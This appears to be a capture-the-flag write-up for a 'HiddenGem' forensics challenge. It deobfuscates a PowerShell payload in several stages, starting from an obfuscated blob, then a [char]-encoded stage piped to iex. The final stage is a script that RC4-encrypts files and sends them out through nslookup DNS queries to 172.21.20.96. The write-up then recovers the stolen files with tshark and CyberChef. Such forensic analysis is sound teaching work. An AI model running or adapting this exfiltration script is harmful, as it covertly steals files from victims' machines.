}${@[}  +${)}${'$[}${~}+  ${)}${~=}${~=}${]}  +${)}${~=}${~=}${![/}  +${)}${~=}${;+}${$] }  +${)}${~=}${~=}${;+}  +  ${)}${~=}${;+}${~}+  ${)}${![/}${;+}  +  ${)}${~}${]}+${)}${~=}${~=}${](}  +  ${)}${![/}${~=}  +${)}${$] }${@$/}  +  ${)}${~}${@[}  +  ${)}${~}${]}+  ${)}${~=}${;+}${'$[}  +  ${)}${]}${~=}+  ${)}${~}${]}+  ${)}${~=}${;+}${~=}+  ${)}${![/}${]}+  ${)}${](}${]}  +${)}${~=}${;+}${~=}+${)}${~=}${~=}${;+}+${)}${~=}${;+}${~}+  ${)}${~=}${~=}${]}+${)}${~=}${;+}${![/}  +  ${)}${$] }${@$/}  +  ${)}${~}${@[}+${)}${~}${]}+  ${)}${~=}${~=}${![/}  +${)}${]}${~=}+  ${)}${~}${![/}  +${)}${~}${![/}  +${)}${$] }${@$/}  +  ${)}${~}${@[}  +${)}${~}${]}+  ${)}${~=}${~=}${;+}+${)}${]}${~=}+  ${)}${![/}${'$[}  +  ${)}${$] }${@$/}  +  ${)}${~}${@[}  +  ${)}${~=}${~=}${@$/}+${)}${~=}${;+}${![/}+${)}${~=}${;+}${$] }+  ${)}${~=}${;+}${'$[}  +  ${)}${~=}${;+}${~=}+${)}${~}${@[}  +${)}${![/}${;+}  +  ${)}${~}${]}+${)}${~=}${~=}${;+}+  ${)}${~}${@[}  +  ${)}${![/}${$] }+${)}${~=}${;+}${'$[}  +${)}${~=}${;+}${~=}  +  ${)}${~}${@[}+${)}${![/}${;+}+  ${)}${~}${]}  +  ${)}${~=}${;+}${'$[}+${)}${![/}${](}  +${)}${~}${]}  +  ${)}${@$/}${'$[}+${)}${![/}${~=}  +  ${)}${![/}${~=}  +${)}${~}${@[}+${)}${~=}${@[}${~}  +${)}${~}${@[}  +${)}${~}${]}  +  ${)}${@$/}${@$/}  +  ${)}${]}${~=}  +  ${)}${~}${]}  +${)}${@$/}${'$[}  +  ${)}${$] }${@$/}+${)}${~}${@[}  +${)}${~=}${;+}${$] }  +  ${)}${~=}${;+}${@[}  +${)}${~}${@[}+${)}${![/}${;+}  +${)}${![/}${;+}  +  ${)}${~}${]}+  ${)}${~=}${~=}${;+}+  ${)}${![/}${@[}  +  ${)}${~}${]}  +${)}${@$/}${'$[}+${)}${![/}${~=}  +${)}${![/}${~}+${)}${~}${]}  +  ${)}${@$/}${@$/}  +${)}${~}${@[}  +${)}${![/}${$] }  +${)}${~=}${;+}${~}+${)}${~=}${~=}${]}  +  ${)}${~}${@[}+  ${)}${~}${]}+${)}${~=}${;+}${'$[}  +${)}${![/}${~=}+${)}${~}${@[}  +  ${)}${~=}${@[}${~}+${)}${~}${@[}+  ${)}${~}${]}  +  ${)}${@$/}${@$/}+${)}${]}${~=}  +  ${)}${~}${]}  +  ${)}${~=}${;+}${'$[}  +${)}${![/}${$] }  +${)}${![/}${;+}+  ${)}${~}${]}+  ${)}${~=}${~=}${;+}+  ${)}${![/}${@[}+${)}${~}${]}  +  ${)}${@$/}${'$[}  +  ${)}${![/}${~=}+${)}${~}${@[}+${)}${~=}${@[}${$] }  +  ${)}${$] }${@$/}  +${)}${~}${@[}  +${)}${~}${]}+  ${)}${~=}${~=}${![/}  +${)}${![/}${~}+${)}${]}${~=}+  ${)}${~}${]}+  ${)}${~=}${;+}${~=}  +  ${)}${![/}${]}  +${)}${'$[}${~}+${)}${~=}${~=}${](}  +  ${)}${@$/}${'$[}  +  ${)}${~=}${~=}${$] }+${)}${~=}${~=}${]}  +  ${)}${~=}${~=}${![/}  +${)}${~=}${;+}${$] }+${)}${~=}${~=}${;+}+  ${)}${~=}${;+}${~}  +${)}${![/}${;+}+${)}${~}${]}  +${)}${~=}${~=}${;+}+${)}${![/}${@[}+  ${)}${~}${]}  +${)}${@$/}${'$[}  +  ${)}${![/}${![/}+  ${)}${~}${@[}+  ${)}${~}${]}+  ${)}${@$/}${@$/}  +${)}${![/}${~=}  +${)}${~}${@[}+${)}${![/}${~}+${)}${~}${@[}  +  ${)}${~}${![/}+  ${)}${![/}${]}  +  ${)}${~}${![/}+${)}${$] }${@$/}+  ${)}${~}${@[}+${)}${~=}${;+}${$] }+${)}${~=}${;+}${@[}  +${)}${~}${@[}+${)}${![/}${;+}+  ${)}${![/}${;+}  +  ${)}${~}${]}+  ${)}${~=}${~=}${;+}  +  ${)}${~}${](}+  ${)}${~}${]}  +  ${)}${~=}${~=}${$] }  +  ${)}${![/}${~=}  +  ${)}${~}${@[}+  ${)}${![/}${$] }  +  ${)}${~=}${;+}${~=}  +  ${)}${~=}${~=}${~}  +${)}${~}${@[}+${)}${![/}${;+}+${)}${~}${]}+  ${)}${~=}${~=}${$] }+${)}${![/}${$] }  +${)}${![/}${@$/}+  ${)}${![/}${~=}  +  ${)}${![/}${~=}+${)}${~}${@[}  +  ${)}${~=}${@[}${~}+  ${)}${~}${@[}+${)}${~=}${~=}${;+}+${)}${~=}${~=}${$] }+  ${)}${~=}${;+}${'$[}  +  ${)}${~=}${~=}${~=}  +${)}${~=}${~=}${~=}+${)}${~=}${;+}${](}+${)}${~=}${~=}${](}  +${)}${~=}${~=}${@[}+${)}${~}${@[}  +${)}${![/}${$] }+  ${)}${~=}${~=}${]}+  ${)}${~=}${@[}${~=}+  ${)}${~=}${~=}${@[}  +  ${)}${~=}${;+}${~=}+  ${)}${]}${~=}+${)}${]}${$] }  +  ${)}${~}${@[}  +  ${)}${~}${]}+${)}${~=}${~=}${![/}  +${)}${~}${]}  +${)}${@$/}${](}  +  ${)}${![/}${]}+  ${)}${~}${@[}  +  ${)}${~}${]}+${)}${~=}${;+}${;+}  +  ${)}${$] }${@$/}  +${)}${~}${@[}+  ${)}${~}${]}  +${)}${~=}${~=}${![/}+  ${)}${]}${~=}+${)}${~}${![/}  +${)}${~}${![/}  +${)}${~}${@[}+  ${)}${~=}${@[}${$] }+${)}${~}${@[}  +${)}${~}${]}  +${)}${~=}${~=}${;+}  +${)}${]}${~=}+  ${)}${~}${]}+${)}${~=}${~=}${;+}  +${)}${![/}${~}  +  ${)}${![/}${@$/}+${)}${~}${@[}+${)}${~=}${@[}${$] }  +  ${)}${~}${@[}  +  ${)}${~=}${~=}${;+}+${)}${~=}${~=}${$] }  +  ${)}${~=}${;+}${'$[}  +  ${)}${~=}${~=}${~=}+${)}${~=}${~=}${~=}+${)}${~=}${;+}${](}  +  ${)}${~=}${~=}${](}+  ${)}${~=}${~=}${@[}  +${)}${~}${@[}+  ${)}${![/}${$] }+${)}${~=}${~=}${]}  +  ${)}${~=}${@[}${~=}+  ${)}${~=}${~=}${@[}+  ${)}${~=}${;+}${~=}  +  ${)}${]}${~=}+  ${)}${]}${$] }+${)}${~}${@[}+  ${)}${~}${]}  +  ${)}${~=}${~=}${![/}+  ${)}${~}${]}  +${)}${@$/}${](}  +${)}${![/}${]}  +  ${)}${~}${@[}  +  ${)}${~}${]}  +${)}${~=}${;+}${;+}  +${)}${~}${@[}+  ${)}${~=}${@[}${$] }  |  ${;@!}  "  |&  ${;@!}    

Then decrypt it to get:

1
[CHar]36+[CHar]100+[CHar]61  +[CHar]34  +[CHar]49  +[CHar]55+  [CHar]50  +[CHar]46+[CHar]50+  [CHar]49  +[CHar]46+[CHar]50  +  [CHar]48+[CHar]46+[CHar]57+[CHar]54  +[CHar]34  +[CHar]59  +[CHar]32+  [CHar]36+[CHar]115  +  [CHar]61+  [CHar]52  +  [CHar]59+  [CHar]32  +  [CHar]36+[CHar]98  +[CHar]61+  [CHar]53  +  [CHar]55  +  [CHar]59  +[CHar]32  +[CHar]71+  [CHar]101+  [CHar]116  +[CHar]45  +[CHar]67+  [CHar]104+[CHar]105+  [CHar]108  +[CHar]100  +[CHar]73  +  [CHar]116+[CHar]101+[CHar]109+  [CHar]32  +  [CHar]34  +[CHar]46  +[CHar]34+  [CHar]32+  [CHar]124+  [CHar]32  +[CHar]70+  [CHar]111+[CHar]114+[CHar]101  +[CHar]97+[CHar]99+[CHar]104+[CHar]45+  [CHar]79+[CHar]98  +[CHar]106+  [CHar]101  +[CHar]99  +  [CHar]116+  [CHar]32  +[CHar]123  +  [CHar]36  +  [CHar]97+[CHar]61+  [CHar]91  +  [CHar]83  +  [CHar]121+[CHar]115  +  [CHar]116+[CHar]101+  [CHar]109  +  [CHar]46+[CHar]67+  [CHar]111+  [CHar]110+  [CHar]118+  [CHar]101+  [CHar]114+[CHar]116  +[CHar]93  +[CHar]58+  [CHar]58+  [CHar]84+[CHar]111+  [CHar]66+[CHar]97  +[CHar]115+  [CHar]101+[CHar]54  +  [CHar]52+[CHar]83  +[CHar]116  +  [CHar]114+  [CHar]105+[CHar]110+  [CHar]103+  [CHar]40+  [CHar]36+[CHar]69  +[CHar]110+  [CHar]99  +  [CHar]46+[CHar]71  +[CHar]101  +  [CHar]116  +  [CHar]66+  [CHar]121+[CHar]116+[CHar]101  +[CHar]115+[CHar]40  +[CHar]36  +  [CHar]95  +  [CHar]46+  [CHar]78+  [CHar]97  +[CHar]109  +[CHar]101+[CHar]41+  [CHar]41  +[CHar]59+  [CHar]32  +[CHar]36+[CHar]82+[CHar]61  +  [CHar]123+[CHar]36  +[CHar]68  +  [CHar]44  +[CHar]36  +  [CHar]75  +[CHar]61  +[CHar]36+[CHar]65+[CHar]114  +  [CHar]103  +[CHar]115+[CHar]59  +[CHar]36+  [CHar]83+[CHar]61+  [CHar]48+[CHar]46+  [CHar]46  +  [CHar]50  +  [CHar]53  +[CHar]53  +[CHar]59  +  [CHar]48  +[CHar]46+[CHar]46  +  [CHar]50+  [CHar]53+  [CHar]53  +[CHar]124  +[CHar]37+[CHar]123  +[CHar]36  +  [CHar]74  +[CHar]61  +[CHar]40+[CHar]36+[CHar]74+[CHar]43  +  [CHar]36  +  [CHar]83+  [CHar]91+  [CHar]36+[CHar]95+[CHar]93+  [CHar]43  +  [CHar]36  +  [CHar]75  +[CHar]91  +[CHar]36  +[CHar]95+  [CHar]37  +[CHar]36  +  [CHar]75  +  [CHar]46+[CHar]76  +[CHar]101+[CHar]110  +  [CHar]103+  [CHar]116  +[CHar]104  +[CHar]93+[CHar]41+  [CHar]37+[CHar]50+[CHar]53+[CHar]54  +  [CHar]59  +  [CHar]36+[CHar]83+  [CHar]91+  [CHar]36  +  [CHar]95  +[CHar]93  +  [CHar]44  +  [CHar]36  +[CHar]83+[CHar]91  +[CHar]36+  [CHar]74+  [CHar]93  +[CHar]61+[CHar]36+  [CHar]83+[CHar]91+[CHar]36  +  [CHar]74  +[CHar]93+  [CHar]44  +  [CHar]36  +  [CHar]83  +[CHar]91  +[CHar]36  +[CHar]95  +  [CHar]93  +[CHar]125+[CHar]59  +  [CHar]36+  [CHar]68+  [CHar]124+[CHar]37  +  [CHar]123  +[CHar]36  +[CHar]73+[CHar]61  +[CHar]40+  [CHar]36+  [CHar]73  +  [CHar]43+  [CHar]49+  [CHar]41  +  [CHar]37  +[CHar]50  +[CHar]53+[CHar]54+  [CHar]59+  [CHar]36+  [CHar]72  +[CHar]61+[CHar]40+  [CHar]36  +[CHar]72+  [CHar]43  +[CHar]36+[CHar]83+  [CHar]91  +  [CHar]36+[CHar]73+[CHar]93+[CHar]41  +  [CHar]37  +[CHar]50+  [CHar]53  +  [CHar]54  +[CHar]59+[CHar]36  +[CHar]83+[CHar]91+  [CHar]36  +[CHar]73+[CHar]93+[CHar]44+  [CHar]36+  [CHar]83+  [CHar]91+  [CHar]36+  [CHar]72  +[CHar]93  +  [CHar]61  +[CHar]36+[CHar]83+  [CHar]91  +  [CHar]36+[CHar]72+[CHar]93+  [CHar]44  +  [CHar]36+  [CHar]83  +[CHar]91+  [CHar]36  +  [CHar]73+[CHar]93  +  [CHar]59  +  [CHar]36  +  [CHar]95  +[CHar]45+  [CHar]98+[CHar]120+  [CHar]111  +  [CHar]114+  [CHar]36+  [CHar]83+[CHar]91+  [CHar]40+  [CHar]36+[CHar]83+[CHar]91+  [CHar]36+  [CHar]73  +[CHar]93  +[CHar]43  +  [CHar]36+  [CHar]83  +[CHar]91+[CHar]36  +[CHar]72+[CHar]93  +  [CHar]41+  [CHar]37  +  [CHar]50+  [CHar]53  +  [CHar]54  +[CHar]93+  [CHar]125+  [CHar]125+  [CHar]59+  [CHar]32  +[CHar]36  +  [CHar]69  +[CHar]110  +  [CHar]99+  [CHar]32  +  [CHar]61  +[CHar]32  +  [CHar]91+[CHar]83  +[CHar]121  +  [CHar]115+  [CHar]116  +  [CHar]101  +[CHar]109+  [CHar]46+[CHar]84+[CHar]101+[CHar]120  +  [CHar]116  +[CHar]46  +  [CHar]69  +  [CHar]110  +  [CHar]99+[CHar]111  +[CHar]100  +  [CHar]105+  [CHar]110  +[CHar]103+  [CHar]93+[CHar]58+[CHar]58+  [CHar]65  +  [CHar]83+  [CHar]67+[CHar]73+  [CHar]73  +  [CHar]59  +[CHar]32+[CHar]36  +[CHar]112+[CHar]32+  [CHar]61  +[CHar]32+  [CHar]36+  [CHar]69+  [CHar]110+  [CHar]99+  [CHar]46  +[CHar]71  +[CHar]101  +[CHar]116  +[CHar]66+  [CHar]121+[CHar]116+[CHar]101  +  [CHar]115+[CHar]40  +[CHar]39+[CHar]91+  [CHar]83  +  [CHar]121  +[CHar]115  +  [CHar]116  +  [CHar]101  +[CHar]109+  [CHar]46  +  [CHar]73+[CHar]79+  [CHar]46+  [CHar]70+[CHar]105+  [CHar]108+  [CHar]101  +[CHar]93  +  [CHar]58+  [CHar]58+  [CHar]82+  [CHar]101  +  [CHar]97  +[CHar]100+  [CHar]65+  [CHar]108  +  [CHar]108+[CHar]66  +[CHar]121+[CHar]116  +  [CHar]101  +  [CHar]115  +  [CHar]40  +  [CHar]36  +[CHar]95+[CHar]46  +[CHar]70+[CHar]117+[CHar]108+[CHar]108+[CHar]78  +  [CHar]97  +  [CHar]109  +  [CHar]101+  [CHar]41  +[CHar]39  +  [CHar]41  +  [CHar]59+[CHar]32  +  [CHar]36  +[CHar]122  +[CHar]32+  [CHar]61  +[CHar]32  +  [CHar]36+  [CHar]69+  [CHar]110+  [CHar]99  +[CHar]46  +[CHar]71  +[CHar]101  +  [CHar]116  +[CHar]66  +  [CHar]121  +[CHar]116+  [CHar]101  +[CHar]115  +[CHar]40+[CHar]91+  [CHar]83  +  [CHar]121+  [CHar]115+  [CHar]116  +[CHar]101+[CHar]109+  [CHar]46  +  [CHar]73+[CHar]79+  [CHar]46  +[CHar]70  +[CHar]105  +  [CHar]108+[CHar]101  +  [CHar]93+  [CHar]58+[CHar]58  +[CHar]82  +  [CHar]101  +[CHar]97+  [CHar]100  +[CHar]65  +[CHar]108  +  [CHar]108  +[CHar]66+[CHar]121+  [CHar]116  +[CHar]101  +[CHar]115+  [CHar]40+[CHar]36  +  [CHar]95  +  [CHar]46  +  [CHar]70  +[CHar]117  +[CHar]108+  [CHar]108  +  [CHar]78+[CHar]97+[CHar]109  +  [CHar]101  +[CHar]41+[CHar]41  +  [CHar]59  +[CHar]32  +[CHar]36  +[CHar]117  +[CHar]32+[CHar]61  +[CHar]32  +  [CHar]40+  [CHar]38  +  [CHar]32+[CHar]36+[CHar]82+[CHar]32  +[CHar]36  +[CHar]122  +[CHar]32+  [CHar]36+[CHar]112  +  [CHar]41+  [CHar]59+[CHar]32+  [CHar]36+[CHar]101  +  [CHar]32  +[CHar]61+[CHar]32+[CHar]91+  [CHar]83  +[CHar]121  +  [CHar]115+[CHar]116+  [CHar]101+[CHar]109  +[CHar]46  +[CHar]67  +[CHar]111  +[CHar]110+[CHar]118  +  [CHar]101+[CHar]114  +  [CHar]116  +  [CHar]93+[CHar]58  +[CHar]58+  [CHar]84  +  [CHar]111+  [CHar]66+[CHar]97  +  [CHar]115  +[CHar]101  +[CHar]54+[CHar]52  +[CHar]83+  [CHar]116  +[CHar]114  +[CHar]105  +[CHar]110  +  [CHar]103+  [CHar]40  +  [CHar]36+[CHar]117  +  [CHar]41  +[CHar]59  +  [CHar]32  +  [CHar]36+  [CHar]108  +  [CHar]61+  [CHar]36+  [CHar]101+  [CHar]46+  [CHar]76  +[CHar]101+[CHar]110+[CHar]103+  [CHar]116+[CHar]104  +  [CHar]59  +  [CHar]32+[CHar]36+  [CHar]114  +[CHar]61+  [CHar]34  +[CHar]34  +[CHar]59  +  [CHar]32  +[CHar]36+  [CHar]110+[CHar]61+  [CHar]48  +  [CHar]59  +  [CHar]32  +  [CHar]119+[CHar]104+[CHar]105+  [CHar]108  +  [CHar]101+[CHar]32  +[CHar]40  +  [CHar]36+[CHar]110+  [CHar]32  +  [CHar]45+[CHar]108  +[CHar]101  +  [CHar]32+[CHar]40+  [CHar]36  +  [CHar]108+[CHar]47  +[CHar]36  +  [CHar]98+[CHar]41  +  [CHar]41  +[CHar]32+[CHar]123  +[CHar]32  +[CHar]36  +  [CHar]99  +  [CHar]61  +  [CHar]36  +[CHar]98  +  [CHar]59+[CHar]32  +[CHar]105  +  [CHar]102  +[CHar]32+[CHar]40  +[CHar]40  +  [CHar]36+  [CHar]110+  [CHar]42  +  [CHar]36  +[CHar]98+[CHar]41  +[CHar]43+[CHar]36  +  [CHar]99  +[CHar]32  +[CHar]45  +[CHar]103+[CHar]116  +  [CHar]32+  [CHar]36+[CHar]108  +[CHar]41+[CHar]32  +  [CHar]123+[CHar]32+  [CHar]36  +  [CHar]99+[CHar]61  +  [CHar]36  +  [CHar]108  +[CHar]45  +[CHar]40+  [CHar]36+  [CHar]110+  [CHar]42+[CHar]36  +  [CHar]98  +  [CHar]41+[CHar]32+[CHar]125  +  [CHar]59  +[CHar]32  +[CHar]36+  [CHar]114  +[CHar]43+[CHar]61+  [CHar]36+  [CHar]101  +  [CHar]46  +[CHar]83+[CHar]117  +  [CHar]98  +  [CHar]115+[CHar]116  +  [CHar]114  +[CHar]105+[CHar]110+  [CHar]103  +[CHar]40+[CHar]36  +[CHar]110+[CHar]42+  [CHar]36  +[CHar]98  +  [CHar]44+  [CHar]32+  [CHar]36+  [CHar]99  +[CHar]41  +[CHar]32+[CHar]43+[CHar]32  +  [CHar]34+  [CHar]46  +  [CHar]34+[CHar]59+  [CHar]32+[CHar]105+[CHar]102  +[CHar]32+[CHar]40+  [CHar]40  +  [CHar]36+  [CHar]110  +  [CHar]37+  [CHar]36  +  [CHar]115  +  [CHar]41  +  [CHar]32+  [CHar]45  +  [CHar]101  +  [CHar]113  +[CHar]32+[CHar]40+[CHar]36+  [CHar]115+[CHar]45  +[CHar]49+  [CHar]41  +  [CHar]41+[CHar]32  +  [CHar]123+  [CHar]32+[CHar]110+[CHar]115+  [CHar]108  +  [CHar]111  +[CHar]111+[CHar]107+[CHar]117  +[CHar]112+[CHar]32  +[CHar]45+  [CHar]116+  [CHar]121+  [CHar]112  +  [CHar]101+  [CHar]61+[CHar]65  +  [CHar]32  +  [CHar]36+[CHar]114  +[CHar]36  +[CHar]97  +  [CHar]46+  [CHar]32  +  [CHar]36+[CHar]100  +  [CHar]59  +[CHar]32+  [CHar]36  +[CHar]114+  [CHar]61+[CHar]34  +[CHar]34  +[CHar]32+  [CHar]125+[CHar]32  +[CHar]36  +[CHar]110  +[CHar]61+  [CHar]36+[CHar]110  +[CHar]43  +  [CHar]49+[CHar]32+[CHar]125  +  [CHar]32  +  [CHar]110+[CHar]115  +  [CHar]108  +  [CHar]111+[CHar]111+[CHar]107  +  [CHar]117+  [CHar]112  +[CHar]32+  [CHar]45+[CHar]116  +  [CHar]121+  [CHar]112+  [CHar]101  +  [CHar]61+  [CHar]65+[CHar]32+  [CHar]36  +  [CHar]114+  [CHar]36  +[CHar]97  +[CHar]46  +  [CHar]32  +  [CHar]36  +[CHar]100  +[CHar]32+  [CHar]125  |  iex  

Finally, when decrypting and formatting, you can get

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
$d="172.21.20.96"; 
$s=4;
$b=57;
Get-ChildItem "." | Foreach-Object {
$a=[System.Convert]::ToBase64String($Enc.GetBytes($_.Name));
$R={
$D,$K=$Args;
$S=0..255;0..255|%{
$J=($J+$S[$_]+$K[$_%$K.Length])%256;
$S[$_],$S[$J]=$S[$J],$S[$_]
};
$D|%{
$I=($I+1)%256;
$H=($H+$S[$I])%256;
$S[$I],$S[$H]=$S[$H],$S[$I];
$_-bxor$S[($S[$I]+$S[$H])%256]
}
};
$Enc = [System.Text.Encoding]::ASCII;
$p = $Enc.GetBytes('[System.IO.File]::ReadAllBytes($_.FullName)');
$z = $Enc.GetBytes([System.IO.File]::ReadAllBytes($_.FullName));
$u = (& $R $z $p);
$e = [System.Convert]::ToBase64String($u);
$l=$e.Length;
$r="";
$n=0;
while ($n -le ($l/$b)) {
$c=$b;
if (($n*$b)+$c -gt $l) {
$c=$l-($n*$b)
};
$r+=$e.Substring($n*$b, $c) + ".";
if (($n%$s) -eq ($s-1)) {
nslookup -type=A $r$a. $d; $r=""
}
$n=$n+1
}
nslookup -type=A $r$a. $d
}

It can be observed that his essence is base64+rc4+ splitting

Made a cyberchef decryption:

https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)RC4(%7B’option’: ‘UTF8’,’string’:’%5BSystem.IO.File%5D::ReadAllBytes($_.FullName)’%7D,’Latin1’,’Latin1’)From_Decimal(‘Space’,false)

Decrypt DNS packets:

tshark -r HiddenGem.pcapng -T fields -e dns.resp.name | sed '/^\s*$/d' > 1.txt

First extract all of them into 1.txt. It can be seen that the form of dns traffic is to encrypt the data above and then separate every 57 characters with “.”, with three paragraphs per line and add the base64 of the file name at the end encoding, so with a simple extraction, all the filenames are known

1
2
3
4
5
des.txt
KCSC.jpg
SecretPlan.pdf
update.ps1
zoneblue.jpg

The most suspicious one is SecretPlan.pdf, so you can manually extract it and remove the data other than the file data, and then decrypt it in the cyberchef link above.

To get the url https://pastebin.com/xCmXLGUq, access to get the flag
–> idek{RDP_Cache_1s_g0OD_bu7_1_h4t3_t4K1n9_t3x7_fr0M_Im4g3s}